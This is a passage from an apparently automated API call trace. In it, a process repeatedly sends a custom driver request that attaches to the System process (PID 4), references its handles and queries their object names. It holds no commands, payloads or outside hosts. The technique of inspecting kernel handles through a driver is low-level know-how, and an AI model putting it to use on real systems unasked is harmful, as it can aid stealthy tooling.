RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.421] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0240.421] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.421] PsAcquireProcessExitSynchronization () returned 0x0 [0240.421] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.421] ObReferenceObjectByHandle (in: Handle=0xffffffff8000026c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003680df0, HandleInformation=0x0) returned 0x0 [0240.421] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.421] PsReleaseProcessExitSynchronization () returned 0x2 [0240.421] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.421] ObQueryNameString (in: Object=0xfffffa8003680df0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.421] ObfDereferenceObject (Object=0xfffffa8003680df0) returned 0x1 [0240.422] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.422] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.422] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.422] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0240.422] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.422] PsAcquireProcessExitSynchronization () returned 0x0 [0240.422] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.422] ObReferenceObjectByHandle (in: Handle=0xffffffff8000027c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003682e20, HandleInformation=0x0) returned 0x0 [0240.422] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.422] PsReleaseProcessExitSynchronization () returned 0x2 [0240.422] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.422] ObQueryNameString (in: Object=0xfffffa8003682e20, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.422] ObfDereferenceObject (Object=0xfffffa8003682e20) returned 0x1 [0240.422] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.422] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.422] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.422] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0240.422] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.422] PsAcquireProcessExitSynchronization () returned 0x0 [0240.422] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.423] ObReferenceObjectByHandle (in: Handle=0xffffffff80000284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036801a0, HandleInformation=0x0) returned 0x0 [0240.423] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.423] PsReleaseProcessExitSynchronization () returned 0x2 [0240.423] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.423] ObQueryNameString (in: Object=0xfffffa80036801a0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.423] ObfDereferenceObject (Object=0xfffffa80036801a0) returned 0x1 [0240.423] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.423] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.423] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.423] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0240.423] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.423] PsAcquireProcessExitSynchronization () returned 0x0 [0240.423] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.423] ObReferenceObjectByHandle (in: Handle=0xffffffff80000288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003682530, HandleInformation=0x0) returned 0x0 [0240.423] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.423] PsReleaseProcessExitSynchronization () returned 0x2 [0240.423] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.423] ObQueryNameString (in: Object=0xfffffa8003682530, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.423] ObfDereferenceObject (Object=0xfffffa8003682530) returned 0x1 [0240.423] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.423] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.423] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.424] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0240.424] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.424] PsAcquireProcessExitSynchronization () returned 0x0 [0240.424] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.424] ObReferenceObjectByHandle (in: Handle=0xffffffff8000029c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003538520, HandleInformation=0x0) returned 0x0 [0240.424] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.424] PsReleaseProcessExitSynchronization () returned 0x2 [0240.424] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.424] ObQueryNameString (in: Object=0xfffffa8003538520, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.424] ObfDereferenceObject (Object=0xfffffa8003538520) returned 0x1 [0240.424] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.424] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.424] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.424] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x70, lpOverlapped=0x0) returned 1 [0240.424] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.424] PsAcquireProcessExitSynchronization () returned 0x0 [0240.424] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.424] ObReferenceObjectByHandle (in: Handle=0xffffffff800002a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003698db0, HandleInformation=0x0) returned 0x0 [0240.424] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.424] PsReleaseProcessExitSynchronization () returned 0x2 [0240.424] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.424] ObQueryNameString (in: Object=0xfffffa8003698db0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.425] ObfDereferenceObject (Object=0xfffffa8003698db0) returned 0x1 [0240.425] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.425] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.425] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.428] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0240.428] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.428] PsAcquireProcessExitSynchronization () returned 0x0 [0240.428] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.428] ObReferenceObjectByHandle (in: Handle=0xffffffff800002b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8005213f20, HandleInformation=0x0) returned 0x0 [0240.428] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.428] PsReleaseProcessExitSynchronization () returned 0x2 [0240.428] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.428] ObQueryNameString (in: Object=0xfffffa8005213f20, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.428] ObfDereferenceObject (Object=0xfffffa8005213f20) returned 0x1 [0240.428] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.428] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.428] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.428] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0240.428] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.428] PsAcquireProcessExitSynchronization () returned 0x0 [0240.428] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.428] ObReferenceObjectByHandle (in: Handle=0xffffffff800002b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800e15a8e0, HandleInformation=0x0) returned 0x0 [0240.428] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.429] PsReleaseProcessExitSynchronization () returned 0x2 [0240.429] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.429] ObQueryNameString (in: Object=0xfffffa800e15a8e0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.429] ObfDereferenceObject (Object=0xfffffa800e15a8e0) returned 0x1 [0240.429] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.429] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.429] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.429] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xf6, lpOverlapped=0x0) returned 1 [0240.429] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.429] PsAcquireProcessExitSynchronization () returned 0x0 [0240.429] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.429] ObReferenceObjectByHandle (in: Handle=0xffffffff800002d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800372ff20, HandleInformation=0x0) returned 0x0 [0240.429] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.429] PsReleaseProcessExitSynchronization () returned 0x2 [0240.429] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.429] ObQueryNameString (in: Object=0xfffffa800372ff20, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.429] ObfDereferenceObject (Object=0xfffffa800372ff20) returned 0x2 [0240.429] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.429] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.429] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.429] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0240.429] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.429] PsAcquireProcessExitSynchronization () returned 0x0 [0240.430] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.430] ObReferenceObjectByHandle (in: Handle=0xffffffff800002d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037208e0, HandleInformation=0x0) returned 0x0 [0240.430] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.430] PsReleaseProcessExitSynchronization () returned 0x2 [0240.430] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.430] ObQueryNameString (in: Object=0xfffffa80037208e0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.430] ObfDereferenceObject (Object=0xfffffa80037208e0) returned 0x2 [0240.430] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.430] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.430] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.430] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x9c, lpOverlapped=0x0) returned 1 [0240.430] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.430] PsAcquireProcessExitSynchronization () returned 0x0 [0240.430] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.430] ObReferenceObjectByHandle (in: Handle=0xffffffff800002dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003727c00, HandleInformation=0x0) returned 0x0 [0240.430] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.430] PsReleaseProcessExitSynchronization () returned 0x2 [0240.430] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.430] ObQueryNameString (in: Object=0xfffffa8003727c00, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.430] ObfDereferenceObject (Object=0xfffffa8003727c00) returned 0x1 [0240.430] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.430] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.431] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.431] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0240.431] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.431] PsAcquireProcessExitSynchronization () returned 0x0 [0240.431] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.431] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003727ab0, HandleInformation=0x0) returned 0x0 [0240.431] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.431] PsReleaseProcessExitSynchronization () returned 0x2 [0240.431] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.431] ObQueryNameString (in: Object=0xfffffa8003727ab0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.431] ObfDereferenceObject (Object=0xfffffa8003727ab0) returned 0x1 [0240.431] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.431] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.431] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.431] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0240.431] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.432] PsAcquireProcessExitSynchronization () returned 0x0 [0240.432] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.432] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800372d8e0, HandleInformation=0x0) returned 0x0 [0240.432] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.432] PsReleaseProcessExitSynchronization () returned 0x2 [0240.432] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.432] ObQueryNameString (in: Object=0xfffffa800372d8e0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.432] ObfDereferenceObject (Object=0xfffffa800372d8e0) returned 0x1 [0240.432] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.432] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.432] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.432] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x140, lpOverlapped=0x0) returned 1 [0240.432] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.432] PsAcquireProcessExitSynchronization () returned 0x0 [0240.432] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.432] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800372eda0, HandleInformation=0x0) returned 0x0 [0240.432] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.432] PsReleaseProcessExitSynchronization () returned 0x2 [0240.432] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.433] ObQueryNameString (in: Object=0xfffffa800372eda0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.433] ObfDereferenceObject (Object=0xfffffa800372eda0) returned 0x2 [0240.433] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.433] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.433] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.433] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x140, lpOverlapped=0x0) returned 1 [0240.433] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.433] PsAcquireProcessExitSynchronization () returned 0x0 [0240.433] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.433] ObReferenceObjectByHandle (in: Handle=0xffffffff800002ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003733e20, HandleInformation=0x0) returned 0x0 [0240.433] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.433] PsReleaseProcessExitSynchronization () returned 0x2 [0240.433] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.433] ObQueryNameString (in: Object=0xfffffa8003733e20, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.433] ObfDereferenceObject (Object=0xfffffa8003733e20) returned 0x2 [0240.433] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.433] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.433] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.433] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: 